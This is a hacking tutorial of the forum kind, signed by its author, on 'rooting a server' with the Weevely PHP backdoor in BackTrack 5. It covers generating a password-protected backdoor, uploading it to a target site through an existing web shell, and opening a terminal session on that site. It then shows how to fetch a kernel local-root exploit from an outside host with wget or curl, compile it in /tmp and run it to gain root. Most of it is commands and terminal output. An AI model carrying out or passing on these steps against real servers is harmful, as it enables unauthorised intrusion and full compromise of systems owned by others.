SERVER ROOTING WITH WEVELY BACKDOOR IN BACKTRACK 5

[R00ting a server With Weevely [BackDoor in BackTrack]

Hello again guyz, This is me Aitezaz Mohsin

today I'm going to show you how to R00t a server with Weevely in BackTrack.

First of all open Weevely:

Menu > BacTrack > Maintaining Access > Web Backdoors > Weevely 

Or

Open Terminal and type:

root@root: cd /pentest/backdoor/web/weevely

############################################################

Now lets make our backdoor by typing:

root@root:./main.py -g -o /root/Desktop/backdoor.php -p password

 by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++

-g  = Generate backdoor

-o  = Output

-p  = Password

-u  = URL

-t  = start Terminal session

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:

1. Uploading our backdoor & connecting to it.
2. Checking the Kernel & Finding LocalR00t for it.
3. Compiling The LocalR00t
4. Executing..

###########################################################################

Lets start:

• Open your shell and upload the backdoor:

The link to the backdoor will be the same as shell: For Example:

www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

• Connect to the backdoor by typing:

 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/


+ Using method 'system()'.
+ Retrieving terminal basic environment variables .


[hacker@target.com/]

• Now to find the kernel version type:

uname -a

[hacker@target.com/] uname -a

2.6.18 (example) 

•  Now we have to find the localroot for that kernel in :

1. www.1337day.com
2. www.exploit-db.com
3. www.google.com

and some others..


Now, we go to the directory /tmp/, coz its always writeable,
now lets say the kernel was 2.6.18
there are some ways to get the localroot:

1. uploading through shell
2. wget method
3. curl

Now let me explain how each method works:


ofcourse you know how to upload though the shell :P

• wget

wget www.exploit.com/2.6.18.c

• curl

curl www.exploit.com/2.6.18.c -o new_name


for this TUT we will use WGET




############################################




[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'


     0K .........                                               208M=0s


2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie




[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 zombie


++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie


++++++++++++++++
executing..
++++++++++++++++


[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)


R00ted!
cheers